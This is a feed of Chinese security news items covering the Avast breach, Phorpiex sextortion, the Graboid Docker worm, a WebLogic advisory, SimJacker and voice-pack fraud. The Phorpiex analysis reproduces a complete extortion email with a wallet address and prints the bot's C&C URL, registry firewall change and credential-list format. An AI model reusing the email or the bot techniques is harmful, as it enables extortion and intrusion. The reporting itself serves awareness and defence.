17. 公安机关指定下级公安机关办理利用信息网络实施的黑恶势力犯罪案件的,应当同时抄送同级人民检察院、人民法院。人民检察院认为需要依法指定审判管辖的,应当协商同级人民法院办理指定管辖有关事宜。

18.本意见自2019年10月21日起施行。

9999.jpg

]]>
Avast:两年内第二起针对CCleaner的内网入侵活动 Wed, 23 Oct 2019 22:13:00 +0800 22.png

捷克网络安全软件制造商Avast近期公开了一起影响其内部网络安全的事件。

在发布的一份声明中,该公司表示,有外部攻击者入侵了公司内部网络,而攻击者的目的是往CCleaner软件中植入后门,就像2017年发生的CCleaner安全事件一样。

Avast表示,攻击者之所以能成功入侵,是因为一名员工的VPN登录凭据被攻击者窃取,同时这个帐户缺少多因素身份验证,使得攻击者直接登录了内部网络。

此次入侵是在今年9月23日被发现的,同时Avast也表示,有证据表明,攻击者早在5月14日就开始对Avast的网络进行了试探。

可疑活动时间表

2019年5月14日凌晨2:00

2019年5月15日凌晨4:36

2019年5月15日晚上11:06

2019年7月24日下午3:35

2019年7月24日下午3:45

2019年9月11日下午3:20

2019年10月4日上午11:57

根据Avast首席信息安全官Jaya Baloo的说法:“被窃取的员工身份是没有域管理权限的,不过攻击者在进入网络后通过非法提权成功获得了域管理员权限。”

Baloo告诉ZDNet网站,正是这种异常的权限提升使公司注意到了内部网络的恶意活动。

工作人员最终在Avast的ATA面板中里找到了一系列安全告警,这些警报之前都被工程师们忽略了,以为是误报。值得一提的是,ATA是Microsoft Advanced Threat Analytics(微软高级威胁分析系统)的缩写,这是微软面向企业销售的一款内部网络流量分析系统,旨在保护内部网络的安全。

警报显示,攻击者控制的帐户复制了Avast的活动目录,这是一种负责管理网络环境的集中式目录管理服务。

AVAST让黑客在内网自由活动,以便确定意图

Baloo说,Avast公司在发现入侵者后,并没有第一时间封禁帐户,而是故意让其随意活动,观察他们的行为。

这种情况一直持续到10月15日,随后Avast公司对以前发布的CCleaner版本进行了安全审核,并推出了最新版本。

同时,Avast还更改了用于对CCleaner更新进行签名的数字证书,撤销了以前用于签署旧版本CCleaner的证书。这样做是为了防止攻击者使用旧证书来伪造官方软件。

最后一步则是重置所有员工的VPN登录凭证。

Baloo表示:“在采取了以上所有安全措施后,我们有信心表示CCleaner用户是安全的。”

该杀毒软件制造商表示,目前正在与捷克情报机构、当地捷克警察的网络安全部门以及一个外部取证团队一起调查该事件。

Avast还表示,目前没有证据表明此次攻击和2017年发生的入侵是由同一个黑客组织进行的。不过该公司还是指出,这次入侵是由一位经验丰富的攻击者实施的。

“从我们目前收集到的信息来看,这是一起非常复杂的攻击事件,攻击者非常谨慎,避免留下任何痕迹。”

目前调查仍在进行中,该公司承诺会在后续及时通报调查进度。

2017年CCleaner黑客事件发生在Avast收购CCleaner背后的公司Piriform之前。黑客通过TeamViewer入侵了Piriform的网络,并往CCleaner中植入了后门。据称,只有在CCleaner被安装到某些大公司的网络中时,才会进行第二阶段的攻击。目标包括思科、微软、谷歌、NEC等。Avast表示,2017年有227万用户下载了存在后门的CCleaner软件;1646536台计算机受到了第一阶段的攻击——扫描目标信息;但只有40台电脑遭受了第二阶段的攻击——安装一个强大的后门。

Avast对ZDNet表示,虽然CCleaner屡次成为攻击者目标,但该公司没有计划停止开发CCleaner

9999.jpg

]]>
Avast 称黑客通过窃取雇员的 VPN 凭证入侵了其内网 Wed, 23 Oct 2019 22:13:00 +0800 杀毒软件开发商 Avast 称黑客通过窃取雇员的 VPN 凭证入侵了其内网,而该账户没有多步认证保护。Avast 在 9 月 23 日发现了入侵,它发现的证据显示攻击者对其基础设施的攻击至少可上溯到今年 5 月 14 日。攻击者获取的账户没有域管理员权限,但成功利用提权,攻击者设法获得了域管理员权限。突然的访问权限提升被 Avast 注意到并展开了调查,它有意让入侵的账户继续活跃,以跟踪其活动。Avast  称黑客的目的是向其流行的清理软件 CCleaner 注入恶意程序。此前 CCleaner 曾在 2017 年被植入恶意代码,那次攻击被认为与中国有关。Avast 在发布新版 CCleaner 的同时改变了签名证书,并撤销了旧版本使用的证书,重置了所有雇员的凭证。Avast 称没有证据显示发动攻击的黑客与 2017 年入侵其基础设施的中国黑客组织是同一个组织。

9999.jpg

]]>
网络战O2O进一步升级?伊朗阿巴丹炼油厂疑似遭受网络攻击导致火灾 Wed, 23 Oct 2019 22:13:00 +0800 事件介绍

当地时间2019年10月20日下午,一则关于伊朗阿巴丹炼油厂(Abadan Refinary)发生火灾一事出现于国外媒体报道中,其中提到火势已经受到控制。

微信图片_20191021140811.png

微信图片_20191021140824.jpg

阿巴丹(Abadan)炼油厂建于1912年,是伊朗同类炼油厂中的最大的一家,也曾经是世界上最大的炼油厂。并且目前和中方企业存在合作关系。

微信图片_20191021140830.png

随后,奇安信威胁情报中心红雨滴团队在威胁态势监控过程中,发现外网一个名为@Babak Taghvaee,自我介绍为英国广播公司(BBC)通讯员的账号,发布了一条关于伊朗阿巴丹炼油厂发生火灾的消息,并称已经确认是网络攻击导致的火灾,有可能是出于伊朗对沙特阿拉伯发起的无人机袭击的报复。

微信图片_20191021140835.png

并附上了现场视频。

随后,新增一条关于炼油厂火势已经被控制的消息,但是仍有遭受网络攻击的风险消息。

微信图片_20191021140839.png

最后在评论中发现,其向国家石油公司的主管部门进行确认,并称没有公开消息。

微信图片_20191021140844.png

随后,卡巴斯基安全研究员转发了该推特,并称怀疑是网络攻击,让我们拭目以待。

微信图片_20191021140847.png

扩展信息

此前,红雨滴团队对无人机袭击沙特国家石油公司(阿美石油公司)的两处石油设施并引发火灾一事进行了分析,并对随后美国方面称已经对伊朗进行了秘密网络军事打击一事进行了说明,详情可点击下面的链接。

传统与网络空间中的热战交叠:沙特油仓被炸后前后美伊的多维角力

而结合上述资讯,并结合在16日的国防会议上,美国军方向特朗普列出多项打击伊朗的选项,包含攻击位于伊朗阿巴丹的全球最大炼油厂之一,又或位于哈尔克岛的伊朗最大石油出口设施,可重创伊朗的石油生产及出口能力。

“一向忠实支持特朗普政策的共和党参议员格雷厄姆,形容袭击沙特石油设施属“战争行动”,美国需果断回应,包含考虑攻击伊朗炼油厂。然而,多名共和党参议员包含参院外交委员会主席里施,则敦促政府避免仓促决定。”

可见,伊朗阿巴丹此前就被列为攻击目标,由于目前伊朗方面尚未给出实际攻击归属,奇安信威胁情报中心将持续关注此事,同时期冀石化类能源行业在网络安全方面需敲以警钟,务必加强建设。

9999.jpg

]]>
肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员 Wed, 23 Oct 2019 22:13:00 +0800 介绍

美国联邦调查局IC3(网络犯罪投诉中心)曾在去年的报告中指出,2018年全年勒索邮件的数量增加了242%,其中大部分是“性勒索”,损失总计8300万美元。

性勒索往往是一封要求敲诈付款的电子邮件,威胁说如果收不到钱就会暴露接收人的私密视频和信息,此外,你的电脑可能也被发送者当成了垃圾邮件制造机,在你毫不知情的情况下源源不断地送到受害者手里。

近日,Check Point Research的研究人员发现了这么一类僵尸网络——Phorpiex,它目前操作着超过五十万台受感染主机,向上百万人发送过性勒索邮件。

Phorpiex(又名Trik)僵尸网络活跃了近十年,过去Phorpiex主要通过分发其他恶意软件(包括GandCrab,Pony,Pushdo)来进行加密货币挖掘活动,而近期的Porpiex又添加了一种新形式——以大规模色情邮件进行创收。

在Check Point监控的5个月期间,记录到有超过14个比特币(BTC)转移到Phorpiex活动钱包,价值超过11万美元。虽然听起来可能不是很多,但Phorpiex的维护成本相当低,以平均每月22,000美元的收入而言也算是很高的回报率了。

性勒索邮件

Phorpiex僵尸网络使用垃圾邮件机器人从C&C服务器下载邮件地址数据库,随机选择一个地址,然后由几个硬编码的字符串组成一条消息。垃圾邮件机器人可以产生大量的垃圾邮件,每小时多达30,000封,每次行动影响人数最多可达2700万人。

近期Phorpiex活动中,攻击者开始把受害者的密码附加到电子邮件中,这对于受害者来说无疑加深了他们的恐惧,让攻击者的目的更易达成。

下面是Phorpiex垃圾邮件机器人创建的勒索邮件示例:

来自: Save Yourself

主题:我记录了你–██████

嗨,我知道你的密码之一是:██████

你的计算机感染了我的私人恶意软件,因为你的浏览器未更新/未打补丁,访问一些被我放置了iframe的网站而自动感染上病毒,想了解更多信息,请google“Drive-by exploit”。

恶意软件能使我完全访问你的所有帐户(比如上面的密码),完全控制计算机,还可以通过网络摄像头监视你。

我收集了你的所有私人数据,还通过网络摄像头记录了你全部信息!

之后,我已经不留痕迹地删除了恶意软件,而这封邮件是从某个被黑的服务器发送的,你找不到我。

我能向你所有的额联系人发布你的视频及私人数据。

阻止我的唯一方法是,支付800美元的比特币(BTC)。

与我将要发布的关于你的内容相比,这是一个非常划算的买卖!

您可以在以下位置轻松购买比特币:www.paxful.com,www.coingate.com,www.coinbase.com,或者检查您附近的比特币ATM机,或通过Google查找其他交换机。 

您可以将比特币直接发送到我的钱包,或者先在这里创建自己的钱包:www.login.blockchain.com/en/#/signup/,然后接收并发送给我。

我的比特币钱包是:1Eim8U3kPgkTRNSFKN49jgz9Wv4A1qmcjR

复制并粘贴我的钱包(cAsE-sEnSEtiVE)

你只有3天的付款时间。

我能看到你有没有读取邮件,所以不要装作没看到。

如果你收到这封邮件多次,付款后就可以忽略它。

收到付款后,我将删除所有内容,你可以像以前一样过着和平的生活。记得下次要更新浏览器哦!

在2019年的Phorpiex活动中,垃圾邮件机器人是最终payload之一。Phorpiex垃圾邮件机器人没有自己的持久性机制,由其他Phorpiex模块下载执行。

技术细节

垃圾邮件机器人运行前会执行检查和初始化步骤。首先,为了防止运行多个实例,它尝试创建一个具有特定名称的互斥对象,这个名字是硬编码在样本中,但每个样本都有一个唯一的互斥对象名称:

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图1:垃圾邮件机器人互斥对象的名称

如果互斥对象已经存在,则垃圾邮件机器人将停止运行。否则,它将继续初始化步骤:垃圾邮件机器人删除替代文件流“:Zone.Identifier”,并通过在注册表项下创建新值来添加防火墙异常:

SYSTEM  CurrentControlSet  Services  SharedAccess  Parameters

FirewallPolicy  StandardProfile  AuthorizedApplications  List

垃圾邮件机器人将值“<path_to_spam_bot>:*:Enabled:<hardcoded_ name>”添加到此项。例如:

%TEMP%28764.exe:*:Enabled: WDrvConfiguration

最后查询域“ yahoo.com”或“ aol.com”的MX DNS条目,并尝试通过端口25连接到其SMTP服务器,如果SMTP服务器不可访问则停止运行:

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图2:检查是否可以访问Yahoo SMTP服务器

电子邮件地址数据库

垃圾邮件机器人与其C&C服务器使用未加密的HTTP通信。以下用户代理标头虽然不是Phorpiex垃圾邮件机器人所独有的,但可用于执行HTTP请求:

Mozilla/5.0 (windowsnt10.0;Win64;x64;rv:67.0) Gecko/20100101 Firefox/67.0,并使用URL发送GET HTTP请求:

hxxp:// <C&C服务器> / <硬编码路径> /n.txt或hxxp:// <C&C服务器> / <硬编码路径> /p.txt

例子:

hxxp://193.32.161[.]69/111/n.txt

对此请求的响应包含N个存储在C&C服务器上的电子邮件地址数据库。后续请求被发送来下载这些数据库,并将它们保存在扩展名为“.jpg”的%TEMP%目录下。

无限循环中,恶意软件会生成以下格式的URL:

hxxp:// <C&C服务器> / <硬编码路径> / <rand> .txt

<rand>是1到N之间的随机整数。

要下载的电子邮件数据库的最终URL如下:

hxxp: / / 193.32.161 69/111/135.txt

下载的数据库保存在%temp%文件夹中,文件名由随机数字和“.jpg”扩展名组成。例如:

%temp%5173150314183010.jpg

下载的数据库是一个文本文件,包含多达20,000个电子邮件地址。在各类活动中,我们观察到C&C服务器上有325到1363个电子邮件数据库。因此,一个垃圾邮件运动覆盖了多达2700万潜在的受害者。该文件的每一行包含一个电子邮件地址和一个以“:”分隔的密码,如下所示:

下载的数据库是一个文本文件,最多包含20,000个电子邮件地址。在各种活动中,我们在C&C服务器上观察到有325至1363个电子邮件数据库。因此,一场垃圾邮件运动最多可以覆盖2700万潜在受害者。该文件的每一行都包含一个电子邮件地址和一个以“:”分隔的密码,如下所示:

user1@bigpond.com:secretpassword1

user2@gmail.com:secretpassword2

user3@yahoo.com:secretpassword3

user4@rambler.ru:secretpassword4

垃圾邮件机器人总共创建了15,000个线程来从一个数据库发送垃圾邮件。每个线程从下载的文件中随机抽取一行。所有垃圾邮件线程结束后,将下载下一个数据库文件。如果考虑到延迟,我们可以估计该bot每小时可以发送约30,000封电子邮件:

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图3:创建用于发送垃圾邮件的线程

散布垃圾邮件

为了发送电子邮件,垃圾邮件机器人使用SMTP协议的简单实现。SMTP服务器的地址来自电子邮件地址的域名。建立与SMTP服务器的连接并收到邀请消息后,垃圾邮件机器人将使用自己的外部IP地址(使用icanhazip.com服务获取)发送HELO / EHLO SMTP消息。

然后垃圾邮件机器人试图产生具有以下格式的有效随机域名:“ {4个随机数字} .com”

使用DNS查询检查域的有效性。这导致在联系SMTP服务器之前生成大量DNS请求:

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图4:由Phorpiex垃圾邮件机器人产生的大量DNS请求。

如果域名成功解析,则将其用作发件人的电子邮件地址。发件人电子邮件的第一部分(“ @”之前)是根据硬编码的单词和2个随机数字生成的。发件人的主机名,IP地址和伪造的SMTP服务器的域名也是随机值,如下图所示:

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图5:Phorpiex垃圾邮件机器人SMTP通讯示例

要设置主题字段,垃圾邮件机器人会将用户名或密码连接到随机选择的字符串(可能因样本而异):

肆虐的性勒索邮件,躺赚的Phorpiex botnet幕后人员

图6:Phorpiex垃圾邮件机器人使用的电子邮件主题

因此,如果我们假设john_doe@example.com是受害者的电子邮件地址,则该电子邮件的主题可能是 “I recorded you – john_doe”。

收入

威胁行为者的实际收益有多少呢?Check Point通过对2019年4月以来提取的比特币钱包发现,共14个以上的BTC被转移到了这些钱包中。

通过这些钱包的收款交易数量,我们还可以估算受此活动影响的受害者总数。结论是在五个月的时间里,大约有150名受害者支付了勒索款项。尽管收到的付款数量很少,但这仍然意味着这种简单的欺诈手段是成功的。

另一方面,数据库中的密码通常与受害者的电子邮件账户无关,数据价值相当低。这些数据库以低价出售,甚至可以免费访问。于是Phorpiex的幕后人员们想出了一种方法,利用如此低质量的数据来赚取可观的利润。 

结论

泄露的凭证列表是一种常见且廉价的商品,其中包含的密码通常与其链接的电子邮件地址不匹配,但资深的僵尸网络Phorpiex操作人员却能利用它们和受害者的畏惧心理长期且轻松地创造收入。这种方法的诞生可能也跟Phorpiex曾经分发的Gandcrab的终止运营有关,或者纯粹觉得简单好用,但无论如何,目前运营着超过500,000台受感染主机的Phorpiex,现在还在源源不断地传播着成千上万的性勒索邮件。

转载自: https://www.4hou.com/web/21008.html

9999.jpg

]]>
最新报告称黑客正利用WAV音频文件隐藏挖矿恶意代码 Wed, 23 Oct 2019 22:13:00 +0800 根据最近几个月连续发布的两个安全报告,黑客正在尝试利用WAV音频文件来隐藏恶意代码。这项技术称之为隐写术(steganography),是一种将信息隐藏在另一种数据介质中的技术。

2018-10-26_10h48_57.png.pagespeed.ce.tcM52DM6fT.png

在软件领域,steganography也简称为“stego”,用于描述将文件或文本隐藏在其他格式的文件中的过程。例如,将纯文本隐藏在图像的二进制格式中。事实上黑客已经使用隐写术有十多年了,通常不会用来破坏或者感染设备,而是作为一种转移方法。隐写术允许隐藏恶意代码的文件绕过将不可执行文件格式(例如多媒体文件)列入白名单的安全软件。

以前所有使用隐写术进行恶意软件攻击的实例都围绕使用图像文件格式(例如PNG或JEPG)展开。最近发布的两份报告中的新颖之处在于发现黑客开始使用WAV音频文件,在今年开始被广泛使用。

早在今年6月份,就有报告检测到隐藏在WAV音频文件中的恶意程序活动。赛门铁克安全研究人员表示,他们发现了一个名为Waterbug(或Turla)的俄罗斯网络间谍组织,该组织使用WAV文件将恶意代码从其服务器隐藏并传输到已经感染的受害者。

BlackBerry Cylance在本月发现了第二个恶意软件活动。在今天发布并上周与ZDNet共享的报告中,Cylance说它看到了与赛门铁克几个月前类似的东西。

但是,尽管赛门铁克报告描述了一个国家级的网络间谍活动,但Cylance表示,他们看到WAV隐写技术在日常的加密采矿恶意软件操作中被滥用。Cylance说,这个特殊的威胁参与者正在将WAV音频文件中的隐藏DLL。

该黑客的使用WAV隐写技术用于挖矿,调用系统资源来挖掘加密货币。Lemos告诉ZDNet:“使用隐秘技术需要对目标文件格式有深入的了解。通常,复杂的威胁参与者希望长时间不被发现。

隐写术可以与任何文件格式一起使用,只要攻击者遵守该格式的结构和约束,这样对目标文件进行的任何修改都不会破坏其完整性。

换句话说,通过阻止易受攻击的文件格式来防御隐写术不是正确的解决方案,因为这样最后的结果是许多流行格式都下载不了,例如 JPEG、PNG、BMP、WAV、GIF、WebP、TIFF 等。

9999.jpg





]]>
微信借钱通过语音确认仍被骗 电信诈骗又出新套路 Wed, 23 Oct 2019 22:13:00 +0800 据中国之声报道,近日,多家媒体关注到,利用微信语音包诈骗的案件——一些骗子盗取微信号后,发送借钱语音,受害人听到“声音差不多”的信息,便会信以为真,转账汇款,最终还是落入圈套。这究竟是怎么回事儿?

骗子从微信里发过的语音中提取个人声音生成假语音,还能模仿语气和情绪

江苏南京江宁分局岔路派出所昨天向中国之声介绍了这样一个案例。近日,该局接到报警,10月13号,陈先生微信收到“熟人”王某发来的语音:“借我5000块钱吧,我着急买点东西。”

陈先生听到是朋友的声音,没多想,转了5000元过去。之后,王某又问陈先生能不能再借9000元,陈先生把自己余额还剩400元的截图发给王某,王某说:“400也行,400也转给我吧”,陈先生才起了疑心,但此时,他的微信已经被“王某”拉黑。

“就跟我朋友的声音一模一样,要不是语音,我肯定不会被骗。”

类似的案例还有很多,据媒体报道,2018年,河北石家庄的董女士收到父亲的微信留言,称在超市买东西,没有带钱,要求转账,收到父亲语音回复的董女士转账过去,回家后才发现父亲根本没去过超市,更没有通过微信要求她转账。

那么,这些相似语音或持续聊天的语音文件,是如何发送的?互联网行业从业者、iOS应用逆向工程专家沙梓社说,微信本身并没有开放该项功能:“微信语音的原理大概是,第一步把你对着手机麦克风说的话保存成一个录音文件,第二步再把这个文件发送出去。出于对用户隐私的保护,微信是不关心你说的什么的,所以录音文件的内容它是不检查的,只要文件符合微信要求的那个录音的格式,微信就会把这个录音文件发出去,所以理论上微信可以发送任意内容的录音。”

沙梓社解释,问题主要就出在这一步:“在原本的微信中发出去的录音文件,只能是来自用户本人对着手机麦克风说话的这个声音,不能来自其他渠道,但是那些卖家就可以找一些技术人员来篡改这部分功能,生成一个新的微信程序,这个时候的微信就跟原版的微信不一样了,篡改过的微信可以选择录音文件的来源,不局限于用户对着麦克风说的话了。”

骗子是怎么模拟声音发出语音的呢?江苏南京的案例中,暂无更多案情披露。而在石家庄的案例中,警方此前对媒体披露,嫌疑人通过在用户的聊天记录里发出过的语音,取样模拟出了新的录音信息。从技术上来说,只要有样本,就能模拟出新的内容,甚至能模仿恐惧、哭泣等情绪。

网售语音包和语音软件可以生成任何嗓音和内容的音频

而实际上,如今市面上还有一种诈骗方式:微信语音包。比如我是个男的,现在想模仿一个女孩在网上加好友聊天行骗,就可以去买。日前就有媒体报道,在淘宝、qq群里搜索,就能发现,只需10元就可买到1000条女声的微信语音信息,如果想要其他内容,还可以按照2元每条的价格进行私人定制。还有的,要是花上三十块钱,甚至能获得每日更新的语音包——从日常聊天到唱歌,素材应有尽有。

在大多数人的认知中,如果只是文字聊天,那么你无法判断对方的真实身份,而微信语音只能是该账号用户按住“说话”键,即时说话,才能发送,在一些用户看来,能够通过语音聊天,是“真实”的象征。

实际上,如今只要花十几块钱购买一个语音包,安装之后,语音包通过篡改微信程序,就可以让用户发送录制好的录音文件,也就是说,哪怕你收到了语音,也不能代表对方是真实的。

记者随机购买了一个商户的商品,对方发来一个激活码、语音包下载地址、软件下载地址:“下载好软件会出现图标。然后找到手机设置权限,把权限都打开,再从权限里找到“悬浮窗”设置,把软件的悬浮窗开启一下,进去软件,有个语音管理,下面有个导入本地音响,找到你下载的语音包,点击添加。”

此时,再回到微信,就会出现一个叫“语音mm”软件的悬浮窗,语音文件以文字的形式显示,按住想发送的语音文件内容,屏幕上会出现“语音已准备,请录制”,再按下微信的语音输入键,即自动写入语音包中的任意录音。不论使用者的性别、年龄、口音,都可以发出设置好文字的录音。

专家:现有法律只能对可疑账户封堵,制售虚假语音有违法风险

此类语音包同样可以使用在QQ及各种游戏平台。北京师范大学法学院教授、亚太网络法律研究中心主任研究员刘德良表示,利用语音包骗取财物的行为构成诈骗:“因为诈骗总是以非法占有他人财物为目的,虚构事实、让受害人相信,自觉得交出财物,实现诈骗的目的以从这个意义上来讲,通过语音包来模仿声音达到诈骗的目的,这是一种方式。”

根据国家法律规定,平台无法针对“一对一”的通信内容进行审查,刘德良说,目前更多的是对可疑账户进行封堵:“在‘一对一’的通信过程中,微信或者QQ等平台是不应该进行监管的,因为通信秘密是宪法规定的自由,除非受害人举报了某个嫌疑人利用微信或者QQ的语音包来进行诈骗,这种情况下,微信或者QQ的运营平台,有义务来对帐号进行封堵。”

今年6月,微信安全中心发布《关于打击“微信营销”外挂的公告》,10月,微信团队表示“外挂软件不仅破坏了微信平台的生态平衡和正常运营,还为恶意营销行为提供了便利条件……针对使用微信外挂软件的现象,微信团队一直在加强打击,近期也进行了专项清理。”

沙梓社认为,技术上,这是一场“道高一尺、魔高一丈”的博弈。在网络黑灰产产业链中,一些行为的认定,还不够明确,特别是一些游走在法律边缘的灰色产业,对平台和监管部门来说,都是治理难点,恐怕只有当违法成本大于获利,才能从根本上遏制互联网灰黑产的发展。

防骗最有效的方法还是自我加强防范:首先,不要加不明来源的陌生好友;其次,涉及到钱财问题,无论熟人还是朋友,必须要通过电话联系或者当面确认求证是否属实后再借钱。另外,用户如果发现自己微信号被盗取,可以在微信安全中冻结账号,同时,尽可能第一时间告知家人、朋友,以免骗子得手。

律师称,语音包虽然很多时候被包装成娱乐工具,实际上在其制作、售卖和使用中都可能存在违法风险,不要轻易尝试。

9999.jpg

]]>
通过Docker感染2000多系统、可用来挖矿的蠕虫加密劫持病毒 Wed, 23 Oct 2019 22:13:00 +0800

据美国Palo Alto Networks威胁情报小组Unit42称,研究人员发现了一种新型加密劫持蠕虫病毒“Graboid”,该病毒通过恶意Docker镜像传播。


Docker是一个由Linux和Windows系统上的平台即服务(PaaS)提供商dotCloud开源的开源的应用容器引擎,可让开发人员进行部署、测试、在容器虚拟环境中打包其应用程序,这样做能从运行的主机系统上隔离服务,实现虚拟化。其自2013年以来非常火热,连谷歌的Compute Engine也支持docker在其之上运行。一个完整的Docker由以下几个部分组成:DockerClient客户端、Docker Daemon守护进程、Docker Image镜像和DockerContainer容器。容器完全使用沙箱机制,相互之间不会有任何接口。


虽说Docker有点类似于虚拟机,但Docker不像虚拟机那样需要一整个虚拟操作系统,而是让应用共享同一个系统资源,并且仅随其运行所需的那些组件一起提供,从而减小了其整体大小。


Unit42在发出警报后,Docker从Docker Hub(下载量超16000多次的代码库)移除了恶意映像:预配置在操作系统上的应用程序,一种可共享的“数字快照”。



随着越来越多的业务迁到云上后,大多数终端安全保护软件倾向于不检查容器中的恶意代码,因此有研究强调需要保护容器主机免受未授权访问。Unit42高级云漏洞和利用研究员Jay Chen称,“我们还在查看未能合理配置容器从而导致敏感信息丢失的案例,毕竟默认配置可能对机构造成严重的安全风险。”


蠕虫病毒传播

Unit42表示,其于上个月末发现了该蠕虫病毒,因为其在Shodan上看到了多未经保护的Docker主机里都出现了相同的恶意镜像。


一旦感染容器镜像被远程部署和安装,其还会感染其他主机的程序、连接C2服务器,定期查询漏洞主机并随机选取目标传播该蠕虫病毒。


“我们越来越担心攻击者还会继续利用这些问题传播,许多恶意镜像是在其他热门容器镜像中的伪装下布置后门的,有时为了避免检测还保留了原有镜像的功能。”



据Unit42称,威胁者通过这种手段利用了多达2034个含漏洞的主机,其还表示57.4%的IP地址来自中国,其次是美国,给定时间内有平均900个活跃的矿工时间。恶意软件使用了15个C2服务器,IP文件中列有14个主机,还有一个主机里有50多个已知漏洞,这表示攻击者很可能感染了这些主机并将其作为C2服务器。由于控制了Docker daemon,其直接部署了一个在web服务器容器(如:httpd、nginx),还放置了载荷。



蠕虫仿真

Unit42还模拟了蠕虫的有效性和挖矿能力。其假设IP文件中有2000台主机,其中30%的主机未能运作,每台感染主机上每隔100秒会刷新一次。该实验仿真了一次为期30天的行动,旨在了解蠕虫传播到所有易受感染主机的时间、恶意行为者的挖矿能力以及每个挖矿程序在感染主机上的活跃时间,得到的结果如下:



上图中左未蠕虫传播速度。蠕虫一小时到达所有1400台感染主机(总计2000台,约占70%);右边所显示的是感染主机的中挖矿能力。也就是说,恶意行为者占据了1400个节点的挖矿聚类,至少为900个CPU的挖矿能力。


这些加密劫持蠕虫病毒虽不涉及复杂技术,但其能从C2服务器上定期提取新脚本、能重新将自身定位为勒索软件或其他恶意软件来破坏主机,故该问题不容小觑。

9999.jpg

]]>
【漏洞预警】WebLogic高危漏洞预警(CVE-2019-2891、CVE-2019-2890) Wed, 23 Oct 2019 22:13:00 +0800

640.webp.jpg

2019年10月16日,阿里云应急响应中心监测到Oracle官方发布安全公告,披露WebLogic服务器存在多个高危漏洞,包括反序列化等。黑客利用漏洞可能可以远程获取WebLogic服务器权限,风险较大。

漏洞描述
CVE-2019-2891中,未经授权的攻击者可以通过精心构造的HTTP请求向Console组件发起请求,从而接管WebLogic服务器。CVE-2019-2890中,未经授权的攻击者则通过构造T3协议请求,绕过WebLoig的反序列化黑名单,从而接管WebLogic服务器。
漏洞评级
CVE-2019-2891:高危
CVE-2019-2890:高危
影响版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
安全建议
一、禁用T3协议
如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。
1. 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
2. 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。
3. 保存生效(无需重启)。
二、排查弱口令
排查Weblogic管理后台是否存在弱口令,增强密码强度。
三、升级补丁
相关链接
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

9999.jpg

]]>
29 个国家/地区的 SIM 卡面临 SimJacker 攻击威胁 Wed, 23 Oct 2019 22:13:00 +0800 上个月披露的 SimJakcer 漏洞影响多种 SIM 卡,通过发送一条特别构造的二进制短信,攻击者就可利用该漏洞黑进任意手机。

SimJacker 是此类漏洞的统称。该漏洞存在于现代 SIM 卡中,源自身份验证的缺失和内嵌动态 SIM 工具包中实现的专用安全机制。

多种 SIM 工具包中,已经于上月证实了 S@T Browser 和 Wireless Internet Browser (WIB) 这两种工具无法抵抗 SimJacker 攻击。

当时,电信行业的几位专家向媒体透露,业内多年前已知晓 SimJacker 相关漏洞;甚至有研究人员表示,某监视公司一直在利用该漏洞监视其目标。

Adaptive Mobile Security 的网络安全研究人员近日披露新报告,揭示 SimJacker 攻击更多细节,试图解决此前未回答的几个重要问题,比如受影响的运营商和国家/地区数量,以及已发现的野生攻击细节。

受影响国家/地区列表

尽管出于避免攻击者利用该已披露漏洞的考虑,研究人员并未点出受影响移动运营商的名称,但确实披露了仍在使用脆弱 SIM 卡的国家与地区名。

报告显示,受影响国家横跨五大洲,包含 29 个国家与地区,总共 61 家移动运营商的客户目前仍在使用内嵌 S@T Browser 工具包的脆弱 SIM 卡。

北美洲:墨西哥、危地马拉、洪都拉斯、哥斯达黎加、尼加拉瓜、伯利兹、萨尔瓦多、多米尼加共和国和巴拿马。

南美洲:秘鲁、哥伦比亚、巴西、厄瓜多尔、智利、阿根廷、乌拉圭和巴拉圭。

非洲:尼日利亚、加纳、贝宁、科特迪瓦和喀麦隆。

欧洲:意大利、保加利亚和塞浦路斯。

亚洲:沙特阿拉伯、伊拉克、巴勒斯坦和黎巴嫩。

研究人员称:最大的可能性,保守估计全球数以亿计的 SIM 卡受影响。

另一方面,仅 7 个国家的 8 家移动运营商在其 SIM 卡上装载了 WIB 工具包。这些国家分布在东欧、中美洲、亚洲和西非。

野生 SimJacker 攻击

研究人员披露,一家自 2015 年开始活跃,通过七号信令 (SS7) 网络监视多个国家用户的公司,一直在利用 SimJacker 漏洞收集目标上的信息。

一切始于研究人员在 2018 年第四季度检测到不正常的可疑短信,主动监测后,研究人员在 30 天的时间内,记录下近 2.5 万条发向 1,500 台手机的 Simjacker 消息。

墨西哥手机用户是这波攻击的主要目标,一小部分哥伦比亚和秘鲁的手机服务用户也遭到了攻击。攻击的目的是收集用户位置信息和 IMEI 识别码。

我们认为,在被发现之前,他们已经跟踪这些移动用户几个月甚至几年了。我们还观测到攻击者在不断实验该漏洞的新攻击方式。该攻击变形的次数、规模和复杂度都明显超出了我们在移动网络上见识过的其他任何攻击者。

研究人员观察到,从攻击者控制下的至少 70 个手机号发出的短信数据包里,存在超过 860 个 SimJacker 攻击亚种。

除此之外,如果 SimJacker 攻击失败,攻击者还会尝试使用专用 SS7 攻击。

如何防止 SimJacker 攻击

不幸的是,移动用户不容易发现自己的 SIM 卡上是否装载了脆弱 SIM 浏览器工具包。

尽管用户可以从 Google Play Store 平台下载 SnoopSnitch 一类的应用检测基于可疑二进制短信的攻击,但这需要 root 用户的安卓手机,而且知道了也于事无补。

这是因为,作为潜在受害者,保护自身的余地基本没有,只能等自己的移动运营商实现安全措施,或者如果可能的话,带号转至另外一个安全的网络,换张 SIM 卡。

同时,代表全球移动运营商利益的全球行动通讯系统协会 (GSMA),提供了一些阻止此类攻击的最佳方式,保护全球几十亿手机用户。

另外,SIMalliance 对自身 S@T 浏览器规范做了更新,改善 SIM 工具包安全性,并为 SIM 卡制造商提供了实现 S@T 推送消息安全的建议。

SimJacker 技术报告:

 

